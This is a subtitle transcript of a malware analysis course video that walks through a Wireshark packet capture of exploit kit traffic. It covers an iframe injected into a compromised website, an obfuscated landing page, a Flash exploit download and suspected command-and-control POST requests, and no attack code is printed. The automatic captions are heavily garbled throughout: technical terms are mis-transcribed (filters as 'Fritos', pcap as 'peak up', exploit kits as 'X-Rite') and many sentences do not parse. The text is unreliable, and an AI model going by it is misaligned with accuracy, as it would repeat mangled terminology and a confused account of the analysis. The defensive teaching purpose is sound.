1
00:00:10,690 --> 00:00:12,790
Welcome back everyone to one of those video effects.

2
00:00:12,800 --> 00:00:15,550
But my goal is this under worse engineering course.

3
00:00:15,700 --> 00:00:23,830
In this video how we are going to do a demo of how we can analyze a suspicious of malicious speak app

4
00:00:23,830 --> 00:00:26,320
that contains X like traffic.

5
00:00:26,320 --> 00:00:32,350
So in the pre-history of videos we talked about wireshark we talked about that that captures we talked

6
00:00:32,350 --> 00:00:36,160
about Fritos and how we can narrow down our search reserves.

7
00:00:36,310 --> 00:00:40,650
And we also talked about exploits Gates as a delivery mechanism.

8
00:00:40,900 --> 00:00:47,380
There's that movie are going to combine all these aspects are we going to look at the peak up in Wireshark

9
00:00:47,380 --> 00:00:52,670
and we'll be applying a bunch of fingers to basically analyze and extrapolate them and all them that.

10
00:00:52,960 --> 00:00:59,690
So one of the good resources for downloading peak apps can be dyspepsy card malware traffic analysis

11
00:00:59,800 --> 00:01:00,770
dot net.

12
00:01:00,790 --> 00:01:08,080
This website is an excellent resource for the gaps that are explicitly littered with exposed Gates malware

13
00:01:08,080 --> 00:01:10,240
sends spams.

14
00:01:10,600 --> 00:01:15,120
So this website contains a collection of for all fifteen hundred feet samples.

15
00:01:15,250 --> 00:01:22,960
You can download them and you can start analyzing those gaps to understand how malware traffics are

16
00:01:22,960 --> 00:01:26,180
captured and how exploit it can be analyzed.

17
00:01:26,200 --> 00:01:32,770
It contains a lot of different scenarios about ex-drug Gibbs spam's Fantomex etc. so all those peak

18
00:01:32,770 --> 00:01:40,450
apps can be really really helpful for you to analyze and get more hands on experience or where analyzing

19
00:01:40,750 --> 00:01:43,560
malicious code captures.

20
00:01:43,570 --> 00:01:49,360
So I just wanted to bring up that all these download activities and analysis activities should be carried

21
00:01:49,360 --> 00:01:50,970
out and you will wash all the wiring.

22
00:01:51,190 --> 00:01:57,670
So as you can see currently I'm in my Windows environment and I have downloaded one of the peak apps

23
00:01:57,670 --> 00:02:05,290
from the site and here's the pick uploaded in washer so we can begin by looking at all the UDP request

24
00:02:05,290 --> 00:02:08,770
and response.

25
00:02:08,800 --> 00:02:17,170
See here is my filter if I press enter it shows that there is a get request followed by another get

26
00:02:17,170 --> 00:02:23,980
request that has a pretty long and vear you or I Papen something similar to what we saw in our previous

27
00:02:23,980 --> 00:02:24,850
videos.

28
00:02:24,850 --> 00:02:26,620
So this you are a pattern.

29
00:02:26,650 --> 00:02:32,680
It doesn't mean that it's actually bad but it does point to some suspicious activity because a lot of

30
00:02:32,680 --> 00:02:37,950
times X-Rite states have these kind of weird your patterns.

31
00:02:38,620 --> 00:02:43,330
So this was followed by a response which came out to be a text Sagal.

32
00:02:43,480 --> 00:02:47,510
So most probably this might be the landing page.

33
00:02:47,590 --> 00:02:51,410
There is another request that is followed by a text here.

34
00:02:51,490 --> 00:02:58,030
So probably this is another response that came back from the X-Rite it again it can either be a landing

35
00:02:58,030 --> 00:03:05,600
page or probably some subset of response that was delivered back to us in the race under get request

36
00:03:05,600 --> 00:03:10,250
which is followed by a response that has mine type of SHOCKLEE a flash.

37
00:03:10,360 --> 00:03:16,140
So it seems like after the exploit Kate was able to enumerate our machine it figured out that located

38
00:03:16,150 --> 00:03:19,280
browser it contains that one it will warn you in effect it'll be flash.

39
00:03:19,420 --> 00:03:25,510
That's why a download in a flash exploded onto the machine and there is another get request.

40
00:03:25,510 --> 00:03:33,880
This seems like to be related to the payload download because immediately after this request we are

41
00:03:33,880 --> 00:03:36,520
seeing some Borst activities as well.

42
00:03:36,520 --> 00:03:44,110
So why post activities interesting here is because once malware are the final payload is trub onto the

43
00:03:44,110 --> 00:03:50,910
system the malware will start performing its command and control by sending signals to it so.

44
00:03:51,070 --> 00:03:54,800
And that's where it tries to pull some data to its command and control.

45
00:03:54,800 --> 00:03:58,990
So that's why these false requests can be really interesting to look at.

46
00:03:59,350 --> 00:04:04,900
So let us start by examining the First get requests so we can go to follow.

47
00:04:04,930 --> 00:04:07,150
They should be the same on DCP stream.

48
00:04:07,630 --> 00:04:17,900
So if you see here it seems like the individual visited this Web site and this was the response.

49
00:04:17,920 --> 00:04:26,560
And if you look at the cold closely it seems like a pretty normal as cheaply as DML could.

50
00:04:26,590 --> 00:04:31,840
So you have to figure out the location from where the infection might have started.

51
00:04:31,900 --> 00:04:38,050
So if you scroll all the way to the down you'll see that there is a checkbox could that is present at

52
00:04:38,050 --> 00:04:39,000
the very end.

53
00:04:39,980 --> 00:04:48,120
This javascript seems to be creating an ice free as you can see it's defining a variable.

54
00:04:48,150 --> 00:04:55,640
Q I see that I-frame and then it is creating an element with the same variable name.

55
00:04:55,640 --> 00:05:05,900
So it's basically trying to construct an I-frame that this word high and zero pixel border and the I-frame

56
00:05:05,960 --> 00:05:09,930
is pointing to this particular issue repeat request.

57
00:05:10,010 --> 00:05:16,020
And this seems to be exactly like the request which we just saw in our kneecaps.

58
00:05:16,250 --> 00:05:20,970
So probably this is where the infection actually is beginning from now.

59
00:05:20,970 --> 00:05:26,030
And one thing which I want to bring here is that because this javascript is present all the way at the

60
00:05:26,120 --> 00:05:32,750
end of the SDM code of this website it's highly likely that this Web site might be compromised by the

61
00:05:32,840 --> 00:05:38,110
attackers and they have injected this code into this website.

62
00:05:38,240 --> 00:05:45,420
A lot of times popular content management systems like Wordpress or Drupal except for they they have

63
00:05:45,890 --> 00:05:52,250
a bunch of one notabilities are probably one of their plug ins will have some little video that they

64
00:05:52,770 --> 00:05:55,680
might use can compromise your website.

65
00:05:55,710 --> 00:06:01,110
And once they compromise it they can inject these kinds of scripts into them so that any traffic that

66
00:06:01,110 --> 00:06:07,120
comes to your website will basically get infected by it exploit its.

67
00:06:07,220 --> 00:06:11,630
So let us go back to our big question response here.

68
00:06:11,790 --> 00:06:19,410
So that's the first one that they sledged to this site and get get requests that is right click on a

69
00:06:19,410 --> 00:06:21,530
go to follow the stream.

70
00:06:21,930 --> 00:06:28,850
If you follow the should it be stream it shows that this was the get request and it's the same one which

71
00:06:28,870 --> 00:06:35,470
we saw in the Jetsons scrape in the main website in the previous request.

72
00:06:35,610 --> 00:06:43,380
So the zero holes we got a response and it seems like this web page is also containing in I-frame and

73
00:06:43,440 --> 00:06:47,430
javascript which is pointing to under malicious you are.

74
00:06:47,790 --> 00:06:54,060
If you scroll down further you'll see that there are certain strips which are basically trying to enumerate

75
00:06:54,090 --> 00:06:58,650
browser or trying to look at User-Agent.

76
00:06:59,460 --> 00:07:06,720
So all these groups are pretty legitimate and attackers used these groups to figure out your browser

77
00:07:06,720 --> 00:07:12,500
or figure out the words in Orfield browsers figure out the plugins that are there in your browser.

78
00:07:12,720 --> 00:07:22,950
If he continues trawling down you will see that there is a post the request and the response is very

79
00:07:22,950 --> 00:07:24,690
off the script of script.

80
00:07:24,750 --> 00:07:32,930
So this seems like the name page of the exploited as you can see this is heavily office get hired and

81
00:07:32,940 --> 00:07:36,490
literally nothing can be read in plain text here.

82
00:07:36,660 --> 00:07:43,290
So this is why X-Rite gaps are really really hard to track or really really difficult to understand

83
00:07:43,620 --> 00:07:48,410
because of their heavy obfuscation and my deeper levels of steps in world.

84
00:07:48,420 --> 00:07:52,430
It's not easy to track them when you have a very long Piqua file.

85
00:07:53,680 --> 00:08:00,300
So going back to our request response bill so we looked at this request.

86
00:08:00,360 --> 00:08:07,190
Now let's check this one and seems like it's a response is a flash floods are going good will follow.

87
00:08:07,290 --> 00:08:14,700
It should be the street and as we guessed this is a shockwave flash file and the magic byte is CW as

88
00:08:14,730 --> 00:08:17,060
it means it's a compressed Flash file.

89
00:08:19,170 --> 00:08:25,200
So what do we do here that say if you want to analyze this flash why what they can do here is we can

90
00:08:25,200 --> 00:08:26,150
go to trial.

91
00:08:26,190 --> 00:08:36,680
You can go to export objects and select DP ones we selected the we can select request that shows that

92
00:08:36,770 --> 00:08:39,320
it's an application shockwave.

93
00:08:39,620 --> 00:08:50,070
You can click on see and we can see that probably let's say on our next stop Lekan make as magicians

94
00:08:50,080 --> 00:08:51,970
start and establish s

95
00:08:56,060 --> 00:08:57,720
you're going save the flash flood.

96
00:08:57,930 --> 00:09:03,130
Similarly if let's say you want to save the GMAT pages that we just analyze.

97
00:09:03,240 --> 00:09:09,720
You can just select them and you can click on Save just like we just did with chalk the Flash file.

98
00:09:09,840 --> 00:09:16,560
So if you want to analyze the started landing pages or the browser and munitions capes you can similarly

99
00:09:16,560 --> 00:09:22,570
save them here and you can play with them in their day off the station those.

100
00:09:22,640 --> 00:09:28,200
So let's see those days and go back to our request response.

101
00:09:28,330 --> 00:09:32,450
So we know that this was a flash exploit.

102
00:09:32,470 --> 00:09:36,840
Now there is another get request and.

103
00:09:36,870 --> 00:09:40,150
Seems like there was no response associated with this.

104
00:09:40,170 --> 00:09:43,700
We can just close it off.

105
00:09:43,740 --> 00:09:50,610
So this is how we can analyze the data to figure out whether it contains any tracings off exploitive

106
00:09:50,700 --> 00:09:52,410
activity or not.

107
00:09:52,830 --> 00:10:00,870
So this was a great deal more about how we can analyze exploit gates and donated radios will begin analyzing

108
00:10:00,870 --> 00:10:06,870
the suspicious flashlights and the mandate that gets downloaded from the X-book is actual watching.